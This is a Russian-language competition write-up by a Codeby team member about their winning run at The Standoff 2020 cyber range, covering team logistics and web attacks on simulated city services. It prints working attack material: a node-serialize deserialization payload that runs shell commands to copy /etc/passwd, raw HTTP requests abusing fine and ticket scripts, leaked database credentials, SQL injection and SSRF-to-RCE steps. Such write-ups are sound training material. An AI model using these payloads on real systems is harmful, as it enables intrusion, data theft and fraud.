Киберспорт

Привет, наш дорогой читатель!

Хочу представиться: меня зовут Станислав (@clevergod), я являюсь вице-капитаном команды Codeby.net, и этой статьей мы начинаем цикл из 3х-4х материалов, посвящённых нашему участию вкиберполигоне The Standoff.

По своей старой привычке, постараемся без эмоционально описать всю боль, слезы и радость прошедшего для нашей команды удивительного 123-часового марафона под названием The Standoff 2020.

В этой статье мы расскажем, почему грамотная подготовка - это больше половины успеха и почему так важно организовать взаимодействие ни разунепентест-команды в рамках одного отдельно взятого проекта.

Попробуем передать по шагам атмосферу, но поверьте 5 суток безудержного веселья можно описывать в бесконечном цикле статей или даже снять экшн-сериал

Кто такие Codeby - форум энтузиастов, неравнодушных ребят, проживающих в различных странах и регионах, которых объединяет желание к саморазвитию и безвозмездному обучению молодого поколения специалистов в различных областях деятельности как ИТ, так и информационной безопасности.

P.S. - Хочу сказать, что мы с кэпом (BadBlackHat) очень долго шли к этой победе, преодолевая один барьер за другим, отдавая все силы и ресурсы для того, чтобы наша общая мечта сбылась.

Внимание, статья содержит много скринов!

The Standoffэто уникальная киберсреда, созданная экспертами по ИТ и ИБ для безопасного развития IT-инфраструктуры, которая позволяет смоделировать цифрового двойника современного мегаполиса и продемонстрировать, как киберпреступники могут повлиять на его высокотехнологичную инфраструктуру. Виртуальный город The Standoff содержит те же аппаратные и программные компоненты со всеми имеющимися уязвимостями, что и настоящий город. В этом году здесь были воссозданы аэропорт, морской порт, железная дорога, деловой центр, банк, парк развлечений, городские системы (светофоры и уличное освещение), система телерадиовещания, нефтедобывающая станция, электроподстанция, газораспределительная станция, тепловая электростанция, ветроэлектрическая установка, нефтехимический завод.

На платформе The Standoff специалисты по киберзащите (blueteams 6 команд) и нападающие (redteams 29 команд) разыгрывают целый спектр реальных сценариев кибератак, имитируют полные циклы тестирования.

Оговорюсь, The Standoff, как концепция, вырос из противостояния, которое несколько лет проводилось в рамках международногофорума Positive Hack Days, в котором мы участвовали год назад (в 2019-м). И о том, как прошло наше знакомство с мероприятием впервые, почему мы с 5-го места опустились на 12-е и о планах подготовки - можете прочестьв этой статье.

В целом, задачи атакующих в этом году были понятными: нарушить нормальное состояние этого большого и красивого виртуального города или по-другому реализовать бизнес риски, к примеру:

• украсть персональные данные пользователей или документы с компьютера топ-менеджера;

• вывести все деньги со счетов клиентов банка;

• нарушить багажную ленту в аэропорту;

• отодвинуть трап в момент высадки пассажиров;

• разлить нефть, остановить производство;

• выключить светофоры;

• устроить железнодорожную аварию;

... и иные риски заложенные, а также не предусмотренные организаторами. Помимо этих задач, так же хакерам была поставлена задача найти как можно больше уязвимостей за награду (программа bug bounty).

#УдалЁнка

Итак, в начале текущего, не побоюсь этого слова, ковидного года, мы попали в 15 отобранных команд и начали предпринимать попытки подготовки к мероприятию, учитывая все прошлогодние "косяки и шишки".

Организаторы поставили условия обязательного присутствия в команде некоего ментора (публичную личность, ранее имеющую опыт участия в мероприятии и не участвующую в этом году) иии нам с кэпом больше в голову не пришло ничто иное, как пригласить нашего товарища Батыра, ныне успешного бизнесмена и технический директора Казахстанских компанийNitroTeam и Spectre, Батыржан Тютеев(@b4trjan) ответил нам положительно, и мы были счастливы принять его в нашу команду нашим ментором и экскурсоводом.

Но, Вы уже, наверное, слышали, что первоначальная дата мероприятия (11 марта)была перенесена на осень 2020 года.

Тут вся наша запланированная подготовка была отброшена в "долгий ящик", вся собранная команда без единого дня подготовки разбежалась по своим делам.
Я (@clevergod) занимался подготовкой к OSCP экзамену, привлекал Тимура (@BadBlackHat) и еще нескольких ребят к решению ряда тасков на различных CTF-площадках, таких как HackTheBox, priviahub, TryHackMe.

Делали работу и проекты, уроки с детьми, наблюдали за ситуацией в стране и мире, а так же за коллапсами, которые возникали локально в Казахстане, Киргизии, России, Украине, Белоруссии. Но в один момент меня охватил жар а что, если организаторы реально сдержат данное ими слово и кибер-битва пройдет в режиме удалЁнки, что на фоне всеобщей финансовой расхлябанности казалось несбыточным в текущем году.

И вот она,новость:

После этого анонса мы с Тимуром, как истинные аксакалы, за полтора месяца до мероприятия начали думать, а что собственно делать то?! Мы ведь не готовились вовсе, никаких сходок и игр в атак-дефенс не было. Так же хочу заметить, что на тот момент времени мы не знали регламента, состава команд, но начали потихоньку думать об участии.

Поучаствовали в конкурсе от организаторов 18 сентября, я выиграл какие-то "ништяки" и отказался от них ввиду того, что Казахстан наш любимый в очередной раз "запаковали наглухо" (Arkady Samsonov, личный привет тебе).

Пробежались по нашим прошлогодним заметкам и поняли, что самым неожиданным для нашей команды в прошлом году было очное знакомство друг с другом, как бы это дурно не звучало. Но парадокс ситуации ровно в том, что все, кто участвовал ранее до нас и побеждал - это достаточно крупные и именитые компании, штат участников в которых был огромен и они не просто знакомы между собой, они выполняли реальные проекты друг с другом, и вопросы инструментария, чек-листов и иные орг. моменты у них были реализованы на уровне ВНД и ДНК.

И вплоть до 7 ноября вся наша команда находились в напряжении ожидая вердикт от организаторов по составу команд. И да, за 5 дней до старта нас включили последними в список участников!

Но мы знаем каждого из участников команды нашего форума, их сильные и слабые стороны, и сыграны мы именно в режиме "удалЁнки", нужно лишь немного реструктурировать вектор подготовки и найти инструмент для аккумуляции данных, шлифануть навыки удержания захваченной точки (тут нам очень помог сервисKing of the Hill (KoTH).

Со слезами на глазах вспоминаю 2019 год, когда мы реализовали 1-Day одного сервиса, с удивлением обнаружили, что нас там, мягко говоря, не ждали эти мастодонты, которые властвовали всеми офисами и делали все, чтобы наши бэк-коннекты были уничтожены, даже не успев отработать.

В процессе организационных моментов после очередной новости о том, что один из наших топовых багхантеров Рамазан (r0hack) выбывает из гонки в рамках нашей команды и будет участвовать за "своих DeteAct", а также, при объявлении новостио новом регламенте в режиме удаленки- 30 красных, 5 синих и 6 VPN-коннектов на атакующую команду, часть ребят из прошлого состава тоже оказались за бортом команды по ряду причин.

Почему Бегите глупцы? сказывается опыт участия в прошлом году. Участвовали 15 команд, в результате чего вся ИС (инфраструктура) была довольно часто парализована, организаторы несколько раз ревертили ИС, и наша команда, ровно как и другие участники, находились в локальной сети - не в VPN-туннелях.

Мы и вправду начали переживать за техническую составляющую организаторов, ведь, во-первых, узловая нагрузка на VPN-сервера. во-вторых, простые и банальные сканы сети могут привести к аккумуляции огромного трафика, не говорят уже об автоматизированных скриптах на верхнеуровневых моделях OSI.

Мы поняли, что нужно не просто найти замену, но и укрепить нашу разбросанную по всему СНГ команду. Выделить из всего этого региональную и часовую пользу, привлечь очень нужных узко-занятых и невероятно талантливых ребят. В результате были собраны люди от Европы до Владивостока (привет Доброфлот): Олег(@undefi) с Костаная, Александр(@tgrmofficial), Кирилл(@K1R0Byte) и Мурат(@manfromkz) с Алматы, Magick из Барселоны, Богдан (Mister_Bert0ni) из Украины, постояльцы команды из России и другие. Каждому в команде была отведена отдельная роль. Мы с Тимуром приняли решение разбить людей на 2 команды с 2-мя отдельными суб-капитанами и ветками для общения (и даже заместителями капитанов на всякий случай), отдельными голосовыми каналами и различными задачами, чтобы никто никому не мешал. Параллельно наполняли и аккумулировали данные четко и без помех.

В итоге мы немного перенасытили наш дискорд канал информацией. Как бы ни старались структурировать - все равно получился сумбур, поэтому решили создать отдельный канал, а старым пользовались как личной википедией. Почему именно Discord? - спросите Вы, да потому, что мы с рядом ребят пользуемся им достаточно давно, и ни разу не геймеры. Это единственная площадка, где можно писать тексты, кидать скрины, говорить голосом и стримить свой экран без каких-либо потерь в качестве (ни в одной букве моих текстов нет проплаченной рекламы, только полезные заметки).

Поиграли несколько раз, используя этот чат в дискорде на нескольких площадках, собираясь единовременно в лучшем случае по 2-6 человек. Вот как он выглядел - наш дискорд:

#Боль первая

За 2 дня до начала была развернута большая, для нас лично, ИС на "забугорных дедиках" и "казахских серверах" (Александр А., спасибо за железо):

• У нас были сканеры уязвимостей "всех сортов и марок" (намеренно не упоминаю вендоров);

• Различные сервисы и службы для коммуникации;

• Фишинг-сервисы с отдельно купленными заранее доменными именами, созвучными с оф. сайтом конференции и организаторов;

• Белые IP-адреса (Сергей Д., спасибо за интернет);

• Различные самописные скрипты и инъекции

• Брут и прокси сервера и др.

Почти за все это отвечал в техническом плане 1 человек - Кирилл, за что ему лично низкий поклон.

Самое смешное, что за пару часов до начала мы запутались, настраивая VLAN-ы, и уронили Ethernet интерфейс с выходом в интернет на одном из серверов с ESXi, а сам сервер на тот момент уже стоял в Костанайском ЦОДЕ.

И как Вы, наверное, догадываетесь - Костанайскую область и сам г. Костанай изолировали, в очередной раз,оградив подступы и подъезды города кордонами. Наш Олег, пробрался-таки к серверу спустя 6 часов и "передернул" ну да ладно, это про сетевой интерфейс сказано, пошляки :)

Также хотел бы отметить, что у нас был "козырь в рукаве" - это новая веха в тестировании на проникновение, платформа автоматизации пентеста PenTera от Pcysys(Citum и Axxtel привет), на которую мы очень сильно надеялись до начала марафона. В 98% сетей в L2, даже сильно заVLanенных, она показывала невероятные результаты!

#Боль вторая

За ночь до начала соревнований организаторы присылают нам данные VPN-туннеля и это, господа,L2tp + IPSEC. Да, представьте себе в 21 веке

Мы были в ужасе, почему-то рассчитывая, что к нам прилетят конфиги OpenVPN - видимо мы заигрались на современных CTF-площадках.

Ну так вот, боль заключается в том, что мы находились в часовых поясах от -7 GMT до +10 GMT, вдобавок, уже неделю как развернули PFSence и настроили маршрутизацию, прописали правила для бек-коннектов (Бинд и реверс шеллы), создали, настроили и раздали под всех персональные конфиги, под которые были написаны правила, проверенные на CTF-площадках для каждого. И представьте себе, из-за отсутствия поддержки устаревших протоколов PFSence и OpenSence, мы за ночь должны были придумать аналог, а их на виртуальной среде не так уж много (к примеру, - MikrotikOS, который, к слову, не совсем бесплатный), переписать все рулы, проверить хоть как-то и раздать всем.

#Начало 12.11.2020

Начали мы довольно шустро, без склок и эмоций, без паники и излишних рассуждений. Каждый в команде понимал свою роль, шли четко и позиционно. Пришлось, конечно, вначале попотеть изрядно, когда увидели целую череду принятых очей соперников на дашборде.

Пытались акцентировать внимание на действительно большой инфраструктуре, находили векторы, осуществляли RCE и старались не сдавать их, а всё же осуществить максимальный закреп. Но без ошибок не обошлось

Вошли в 120 подсеть, используя "любимые" пароли организаторов и RDG от Microsoft, (к слову это был тот самый "хваленый" Банк), и на расслабоне допустили роковую ошибку - запустили Mimikatz, за что были немедленно выставлены за пределы подсети.

Большую часть проблем в первые 2-3 суток для нас лично представили именно SOC и защитники, которым нужно отдать должное и похвалить, но и без нареканий некоторых "синих" не обошлось. К примеру, самый веселый и озорной хост, с которым бились не только мы, но и другие команды в 80 подсети (BBG.GQS офис 4), окрестили в "групповой". Ниже поясню почему.

Вот мы видим дыру:

Вот он код:

Код правят на лету:

И мы не можем литься, как раньше, Attack Detect! ишь ты:

Спустя огромное количество времени и использованных умений обхода, находим другую уязвимость, получаем рута:

И тут же отлуп И так продолжалось достаточно долго. У нас на этот хост даже был отдельно выделенный человек-мастодонт, который играл в "короля горы" (об этом термине Вы поймете в продолжении статьи или взглянув на изображение ниже) в течении почти 2 суток, отвлекаясь на другие, не менее интересные вектора. В итоге в капитанском чате кто-то скинул такой вот мем, который не просто повеселил нас, но и придал сил и наградил всю команду зарядом положительных эмоций, которых так не хватало, спасибо тебе автор изображения:

Также были 247 хост в 40 подсети и 135 хост в 20 подсети - во всех случаях в первые двое суток все успешно проэксплуатированные точки входа и привески были запатчены, причем на одной из машин было достаточно четко видно, что привеска до рута не получить, но код правили с диким шорохом, и это точно были защитники.

Знаете, в такой дерганной и мелочной ситуации в начале игры, когда позиции меняются, каждый старается бежать вперед паровоза и играть в позиционные гонки, кто-то из соперников дико чудит - мы начали размениваться частью нажитых очей, проверяя, что все-таки будет с отданными RCE, LFI - их закроют или оставят. Нам необходимо было реально понять, сдавать пустые вектора или держать все позиции до победного.

Поясняю, было приличное количество точек входа, за которыми дальше попросту не было ничего, и мы их называли "пустышки".

В первые двое суток, по крайней мере, мы, размениваясь оплеухами с другими командами, то скидывая с позиций всех, то начинали сначала. Это продолжалось до тех пор, пока инфраструктурщики нашей команды не нарыли реальные точки входа во внутренние сети ряда офисов, и тут мы действительно обомлели, увидев всю ту инфраструктуру, которую заложили организаторы.

Ребята, она была огромна, в ней реально можно было заблудиться. Давайте немного расскажу: первичный скан всех 6-ти подсетей содержал как минимум 10 машин внутри каждой, итого уже более 60-ти хостов. Внутри первого взятого вектора была еще целая офисная сеть, состоящая из леса доменов, первичных, вторичных и read-only контроллеров, различных wsus, db, backup, fileserver, exchange, rdg, sharepoint и других серверов, за которыми находились пользовательские ПК и связующие сервисы, но обо всем об этом поговорим во второй части, которую подготовим уже совсем скоро!

В первый день мы чувствовали, что весь наш запал на победу, азарт и стремление только усиливаются. Покажу, как выглядел внутренний портал 8 часов с момента старта и мы первые! осталось каких-то 116 часов и 16 минут до конца марафона

Для тех, кому чтиво не по душе - оставлю ниже сразу результат марафона. Кому всё же интересно продолжение - оно скоро появится. Во второй части рассказа будут и технические подробности, и новые эмоциональные всплески с реализацией бизнес рисков а пока, посмотрите разбор от организаторовПо следам The Standoff: расследуем успешные атаки на город

В заключении хочется отметить всех, кто так или иначе участвовал в марафоне и подготовке к нему, предоставлял оборудование и серверные мощности и совсем не важно, на минуту заходили или были с нами все 123 часа без сна, спасибо Вам ребята:

• Joan Agusti Martinez Carbonell

• Александр Калединов

• Александр Ким

• Алексей Морозов

• Антон Шепеленко

• Батыржан Тютеев

• Богдан Лукин

• Дмитрий Комиссаренко

• Дмитрий Фёдоров

• Евгений Шадрин

• Кирилл Мурзин

• Кутлымурат Мамбетниязов

• Олег Юрченко

• Паша "Кролик"

• Сергей Песков

• Станислав Истягин

• Тимур Молдалиев

Привет, наш дорогой читатель!

Как обещали, продолжаем наш цикл статей про участие нашей команды The Codeby в кибербитве на полигоне The Standoff. Начало нашего приключения можно почитать здесь. В этот раз вы узнаете технические подробности реализованных бизнес-рисков, уязвимостей в веб-приложениях и некоторые хитрости, которые в какой-то мере помогли нам стать победителями.

Мы уже писали, что разбились на две команды и разделили цели. При этом в каждой команде был инфраструктурщик, вебер, фишер. Несмотря на то, что это дало свои плоды, оглядываясь назад, мы понимаем, что таким образом у нас уменьшилась коллаборация между специалистами одной категории. Например, для вебера со знаниями PHP попадался ресурс на Ruby, и наоборот. Из-за этого в некоторых моментах мы потеряли время, что непростительно в конкурсе, где каждая команда пытается быстрее эксплуатировать уязвимость и закрыть ее. В следующем году возможно стоит сделать разделение именно по специализациям для более быстрого захвата входных точек.

#Риски

В этом блоке я (Леша - @SooLFaa) (Rambler Group) расскажу, как нами были взяты некоторые риски в части WEB и ряд RCE.

В первый день соревнования мы сразу поделились на две команды. Те, кто пробивали внешний периметр и те кто дальше закреплялись внутри доменов (веб и инфраструктура). Я был в первой команде и сразу сконцентрировался только на одной цели - это сервис покупки авиабилетов. Хотя там были уязвимости типа SQL Injection, гадский WAF не оставлял шансов проломиться через них, тогда я стал исследовать логику работы ресурса.

Риск. Покупка бесплатных авиабилетов и билетов на аттракционы.

Для начала разобрался в логике работы процесса покупки билета, по шагам перехватывая каждый запрос в burpsuite от этапа регистрации до этапа оплаты билета.

1. Забиваем параметры поиска и находим любой рейс.

2. Заполняем перс. данные на нужный рейс и жмакаем кнопочку Купить.

   

3. Перехватываем этот запрос в burp и видим следующее:

4) Сохраняем запрос и идем дальше.

А дальше меня перекидывает на платежный шлюз, но никаким способ купить билет не удавалось. Тогда снова прошелся по всем шагам и нашёл в исходном коде странице закомментированную форму, которая ссылается на скрипт successpayment.php с теми же именами параметров, что и запрос в пункте 3. БИНГО! Вероятно - это скрипт подтверждения оплаты.

5) Изменив в POST запросе целевой скрипт, я вернулся в свой личный кабинет и увидел в нем купленный билет.

Нашему счастью не было предела, мы подумали, что реализовали риск:

Логика простая, если билет стоил 1000 рублей, то, купив его за 0 рублей, мы кратно изменили цену. Но по замыслу организаторов - это оказалось не так. Пока наш капитан ушёл доказывать организаторам нашу правду, тем временем, Мурат (@manfromkz) проломил портал города с помощью уязвимости в заливке файлов. Всё оказалось очень просто. Под видом картинки он загрузил payload для выполнения команд на сервере.

Найти путь до картинки тоже не составило труда. Его было видно прямо в разметке HTML.

В итоге наш бэкдор выглядел так.

Скачали все исходники, залили полноценный бэкдор и ушли с этого сервера. Это оказалось нашей роковой ошибкой, но об этом я расскажу чуть позже. А тем временем, наш капитан вернулся. Оказывается - это была незапланированная уязвимость, но нам её засчитали и обозначили их как новые риски. Примечательно, что почти одновременно со мной делала тоже самое команда Deteact.

Но и это ещё не всё. Оказывается, точно такой же скрипт был и на кассе аттракционов. За дело взялся Олег (@undefi), проделав, всё тоже самое, точно таким же способом мы смогли покупать билеты и там. В итоге +2000 очков в кармане.

Дальше мы разбежались каждый по своим таргетам. Кто - то пытался проломить другие хосты, я продолжил брать риски на авиакассе, Мурат уже стрелял как из пулемета в багбаунти (за что мы его прозвали пулеметчик). Об этом он вам сам расскажет. Но вернемся к нашей кассе

Риск. Сделать недоступным регистрацию на рейс.

Тем же способом, я начал исследовать каждый запрос в функционале регистрации на рейс.

И я задумался, а что будет если из запроса удалить id документа и попытаться зарегистрировать несколько билетов на несуществующее место? Одним выстрелом я делаю сразу и то и то. Изменяем запрос. sit=-11&ticketid=6084&transfer=true&transferid=&regdoc=

Запрос, хоть и выполнился успешно, но регистрация не была пройдена. Когда я снова попытался перехватить запрос, кнопка регистрации просто не реагировала. БИНГО!!! Сломали систему регистрации, но только для одного билета.

Смотрим дальше внимательней, видим, что id билета - это числовой идентификатор.

Burp Intruder - Пришло твоё время!

Таким образом, недоступны стали все билеты для регистрации. Ну и + ещё 1000 очков.

Остался еще один риск - это

Риск. Утечка данных о пассажире со специальным идентификатором 1605157946597718.

Посмотрев исходники города слитые Муратом, обнаружили помимо файла servicelogic.php ещё файл citydump.sql - и тут пришла идея. Если есть такой файл на главном портале, значит на сайте авиакомпании может быть что - то похожее и почти сразу же угадали имя файла aviadump.sql

Изучив дамп базы, мы увидели поле regrole, которому если задать числовое значение 3, означало админскую роль. Ну а дальше всё просто, регистрируем нового пользователя с правами админа.

У нас открывается скрытый функционал. Вбиваем идентификатор..

..Иииииии.ВНИМАНИЕ!!!!

Ничего нету!!! Видимо просто до нас уже кто - то удалил эти данные. Но тем не менее риск нам засчитали.

Пора уже оставить в покое эту бедную кассу и перейти в город. Ведь там нас ждал целый дамп с исходниками, который я и начал ресерчить.

Риск. Удаление информации по штрафам и задолженностями граждан

Изучая исходник, я откопал следующие куски кода

Создание штрафов пользователям:

```

if(isset($_POST['fine']) && $_POST['fine'] == 'create'){//var_dump($_POST);die;$queryArray =['siss', $_POST['doc'], $_POST['type'], $_POST['des'], $_POST['price']];$result = $db->executeQuery('INSERT INTO fine VALUES (null, ?, ?, ?, ?)', $queryArray);if(!$result){if($db->getQueryResult($db->executeQuery('SELECT id FROM fine WHERE id = ?', ['i', $db->getLastInsertId()]))){$_SESSION['message'] = ['Fine on document: ' . $_POST['doc'] . ' was create', 'success'];}}else$_SESSION['message'] = ['Error!', 'danger'];}

Удаление штрафов пользователям:

if(isset($_POST['fine']) && $_POST['fine'] == 'delete'){//var_dump($_POST);die;$db->executeQuery('DELETE FROM fine WHERE id = ?', ['i', $_POST['fine_id']]);}

Думаю, вы уже догадались какой вектор.

Так как к тому времени вся инфраструктура уже дышала наладом и кроме нас там побывало куча человек, я решил протестировать уже найденный вектор.

Запрос на создание штрафа:

POST /server_script/service_logic.php HTTP/1.1Host: 10.126.40.247:8005User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://10.126.40.247:8005/index.php?ipage=user_pageContent-Type: application/x-www-form-urlencodedContent-Length: 53Cookie: sfcsrftoken=up9hE0W7Fb2UFDuuBczPRbO6uZmCRrbiEP0qnPSI9on6c54PPr8P8sLPkouQH7OF; PHPSESSID=h3rd6f8pruoh2c8ilpec6knlg7Connection: closeUpgrade-Insecure-Requests: 1fine=create&doc=222333&type=3&des=TEST&price=-1

В результате создан штраф Test с задолженностью -1

И запрос на удаление штрафа:

POST /server_script/service_logic.php HTTP/1.1Host: 10.126.40.247:8005User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://10.126.40.247:8005/index.php?ipage=user_pageContent-Type: application/x-www-form-urlencodedContent-Length: 53Cookie: sfcsrftoken=up9hE0W7Fb2UFDuuBczPRbO6uZmCRrbiEP0qnPSI9on6c54PPr8P8sLPkouQH7OF; PHPSESSID=h3rd6f8pruoh2c8ilpec6knlg7Connection: closeUpgrade-Insecure-Requests: 1fine=delete&fine_id=<number>

Штрафа не оказалось. Что же оформляем отчет, сдаем риск и получаем ответ от организаторов: НЕ ТАК НАДО БЛО. Риск не засчитан!. Сказать, что я был в шоке, ничего не сказать, ведь штраф удалён. И даже больше, тем же Intruderом я удалил ВСЕ ШТРАФ в системе, тем самым, сыграв в Робин Гуда и освободив мирных граждан от уплаты. Но делать нечего, продолжаем ресерчить исходники.

Организаторы непрозрачно намекнули, что надо было править в базе. И, собственно, я почти сразу нахожу в том же коде connectionString.

$db = new db('172.17.61.218:3306', 'script', ';zxxslfc', 'city');

Разумеется, напрямую с игровой сети база недоступна. Очевидно, надо снова зайти на сервер города и оттуда попытаться дернуть данные. И вот тут-то и начались танцы с бубнами. Уязвимость больше недоступна из-за жесткого WAF, который отрезал просто всё и легитимные запросы, и нелегитимные. Даже авторизоваться стало нельзя. Больше двух часов я потратил на попытки вернуться по пути Мурата, но всё тщетно. Общение с организаторами тоже ничего не дало. Что же, придется выкручиваться иначе, смотрим на сеть города и ищем другие хосты рядом, через которые мы также могли бы попасть в базу. Большинство из них были уже недоступны или закрыты WAFом (защитники тоже не спали всё это время) наши бэкдоры потеряны, но таки улыбнулась нам удача, нашли мы всё-таки хост http://10.126.40.5:3000/.

Объединившись с Муратом, стали исследовать функционал голосования.

В корне веб сервера нашли файл auth.json, который содержал ключи для авторизации.

Само же веб приложение предлагало функционал голосования, ключевый запрос которой был следующий:

POST /api/vote HTTP/1.1HOST: 10.126.40.5:3000Accept: application/json, text/javascript, */*; X-AUTH-Token: <тут длинная base64 строка> X-Requested-With: XMLHttpRequestContent-Type: application/jsonOrigin: http://10.126.40.5:3000Accept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8{"pollingName":"poll1", choice: "choice1"}

Так же нашли файл на сервере package.json и поняли, что перед нами NodeJS.

Google - наше всё, оказывается в одном из установленных пакетов была уязвимость в десериализации. Подробнее почитать можно тут (https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)

Стало ясно, что Заголовок X-Auth-Token ни что иное как JWT.

Перебором директории находим ключ для генерации JWT в файле key.pem

-----BEGIN RSA PRIVATE KEY-----Proc-Type: 4,ENCRYPTEDDEK-Info: AES-128-CBC,7704733522F767AF89374B5CFF8518F0cR8PRjShevMVpgkUBmqdNiUVpEdqIyE6RlkWpin4QGG7+vw14RLJyBqrEtGXRdR9ySRRUaLhSRSkFyDoxjHtviwhK2DOTP8jlKzUGojAbLCB7RuwQk0JSci4ixMzDEOC/59iRQH4iJbd4..Oqf4XKI9Q4cpOSCiZkdH8uaJttwUS/9JbeZG3cZQme8WKyto0ya96wkk05PtsPluRBzSFhL+rocP+-----END RSA PRIVATE KEY-----

А дальше дело техники.

Генерируем JWT токен с нагрузкой для десериализации:

{  "id": "f59b33b5-6619-45bf-adcc-5331e871f12e",  "allowedToVote": {    "poll1": "_$$ND_FUNC$$_function(){ require('child_process').exec('cat /etc/passwd > /opt/polling-app/pollings/p_testcoder', function(error, stdout, stderr) { console.log(stdout) }); }()",    "poll2": "voted",    "poll3": "voted",    "poll4": "allowed"  }}

В поле X-Auth-Token подставляем наш JWT и выполняем запрос с нагрузкой cat /etc/passwd > /opt/pollingapp/pollings/ptestcoder, которая запишет в файл /opt/polling-app/pollings/ptestcoder содержимое файла /etc/passwd.

Ну и читаем файл через Path Traversal

Сдаем Rce в Баунти и возвращаемся к штрафам. Хоть мы и получили шелл, клиента mysql не было на сервере, gopher тоже, то есть ничего, что бы помогло нам хоть как-то взаимодействовать с базой. Тогда мне пришла идея дернуть прям родными средствами NodeJs данные из базы. Нагрузка получила следующий вид:

require("mysql2").createConnection({host: "172.17.61.218:3306",user: "script",database:"city",password: ";zxxslfc"}).query("SELECT * FROM fine",function(err, results, fields) { console.log(results); });

Как вы думаете, что произошло? Ответ - ошибка: mysql2 module not found. То есть нет ничего, что помогло бы нам хоть как-то получить данные. Так как сервер отрезан от интернета npm install тоже не помог. Потанцевав ещё с бубнами, Увы и Ах, мы так и не смогли добраться до этих штрафов, все доступные ранее RCE в этой сети уже не работали из - за WAF, сам портал уже умер. Хоть и хочется закончить этот риск хэппи ендом, но, к сожалению, он так и остался не взят. Теперь вы поняли про какую роковую ошибку я говорил? Надо было, как только взяли RCE в городе, сразу проресерчить скрипт и выполнить риск со штрафами.

История про ещё одно RCE

Всё время соревнования мы периодически меняли фокус внимания на багбаунти и искали SQL Injection, SSRF, LFI на всех доступных ресурсах, занимались также уязвимостями в банке (uptime которого оставлял желать лучшего). Мурат продолжал отстреливать SQL инъекциями, я положил на стол ещё пару LFI, периодически помогая команде инфраструктуры, Олег крутил RCE в Мантисе. В общем, все были при деле. И так мы наткнулись на интересный таргет.

Система, которая позволяла рисовать календарь

Перехватив запрос, увидели следующее.

Время было 3 часа ночи. Мы с Олегом ковыряли этот сервис, но никакие вектора LFI не поддавались. Тогда мне на ум приходит идея затестить SSRF, подставив url http://свойбелыйip, я получил заветный reverse-connect. SSRF на лицо. Оформили отчет, сдали в баунти. Разумеется, стали пробовать вектора с RCE (RFI), но я всё таки решил пойти поспать свои 5 часов (именно по стольку мы спали каждый день). На утро пришёл Олег и встретил меня радостным известием, что он таки докрутил вектор до RCE. Достаточно было просто положить файл на внешний сервер с содержимым: eval(тутлюбаяunixкоманда) (Ларчик просто открывался)

А мы мудрили со всякими изощренными нагрузками типа <?php shellexec(cmd) ?>

Пример вывода ls

Посмотрев исходники, всё стало на свои места. Любая команда выполнялась если просто положить её в файл, но я делал это так <?php echo ls -la; ?> и обращался к php скрипту на своем сервере. В итоге за эту уязвимость мы получили баллы сначала как за SSRF, потом ещё как за RCE. Да, оказывается, так тоже можно было :D.

Все найденные уязвимости мы описывать не будем, большинство из них были тривиальны, некоторые были неэксплуатабельны из-за действий защитников и Wafов, если все их описывать, то боюсь, на Хабре кончатся буквы :).

Ну а теперь я подытожу свою часть, на мой взгляд, самым простым, но при этом зрелищным риском.

Риск. Вывод хакерского видео на главный экран города

До конца соревнования остаётся буквально час. В последние сутки мы договорились, что перестаем сдавать отчеты и копим их, дабы не мотивировать другие команды набирать очки. Все уже уставшие, но никто не сдаётся, отрыв с ближайшими конкурентами был всего лишь на несколько тысяч баллов, т.е. достаточно им сдать всего один большой риск и они бы нас обошли.

Забавно, что этот риск мы могли бы сделать в первый же час соревнования, когда я сбрутил учетку оператора, пароль у которой был operator, с первой же попытки :D

Но всё-таки мы его не трогали и решили посмотреть в последний момент.

Залогинившись под юзером, стали исследовать все возможные запросы и нашли следующий скрипт

Он возвращал Json - Объект пользователя с паролем для сброса. Используем его для установки нового пароля.

А дальше просто меняем ссылку на видео и весь город любуется нашим логотипом, ну и вы полюбуйтесь

Вроде всё просто? Но не тут-то было. Помимо нас в конце соревнования в этот таргет валились и другие команды и так же меняли пароль администратора всё это время, соответственно у нас то и дело умирала сессия. Началось противостояние между хакерами за право владения админской учеткой. Капитан, который даёт команду Сейчас я скажу и сразу меняй пароль прям за 5 секунд. А потом крики Твою ж *, опять не успел. В итоге буквально в последние минуты соревнования мы реализовываем, кое как оформляем и отправляем этот риск. И как оказалось не зря, всё, что мы сдали в последний час, сыграло важную роль, чтобы после закрытия соревнования сохранить лидерство.

На этом я с вами, дорогие Хабравчане, прощаюсь и передаю слово своему соратнику по команде Мурату - пулеметчику, который расскажет подробно, за что он получил своё прозвище и как он сделал большинство очков в баунти.

#Запахло горелым

Эту мини-главу расскажу я - Мурат (@manfromkz). И так, похекали поехали!

В сети компании Nuft по адресу 10.126.100.167 находился сайт для онлайн регистрации студентов на разные курсы (Online course registration - OCR). LMS на минималках. Этот ресурс помог нам заработать около 4400 очков, и вы скоро узнаете как.

Сначала была найдена слепая time-based SQL-инъекция в форме авторизации на главной странице ресурса:

Много времени было потрачено на раскрутку этой инъекций, но в итоге хэш пароля и логин администратора удалось получить:

Тут ждала еще одна засада - хэш никак не хотел брутиться. Не помогла даже специально собранная брут-машина с крутыми видеокартами и с огромными словарями. Наверняка другая команда уже вошла в систему и сменила пароль администратора на сложный. Хост был заброшен из-за этого на некоторое время.

Позже я просто попробовал ввести в форму авторизации классический вектор ' or 1='1 и тут запахло горелым. Нет, дело не только в том, что мы потратили кучу времени на раскрутку ресурсозатратной уязвимости и не в тщетных попытках брута небрутабельного хэша, а в том, что реально что-то горело. И это не то место, о котором вы возможно подумали =)

Начал чувствоваться сильный запах гари. Я срочно встал и начал вынюхивать все рабочее место, чтобы исключить неисправность кабелей или ноутбука. В рабочей комнате не смог найти источник запаха, и начал носиться по всей квартире, пока не услышал шум на лестничной площадке. Как только открыл дверь, на меня пошли клубки дыма и ужасный запах, а все соседи были на лестничной площадке, кто-то в спешке выводил своих детей на улицу. Спросил у любого рандомного соседа:

• Нашли источник дыма?

Ответ был кратким и содержательным:

• Да, на первом этаже.

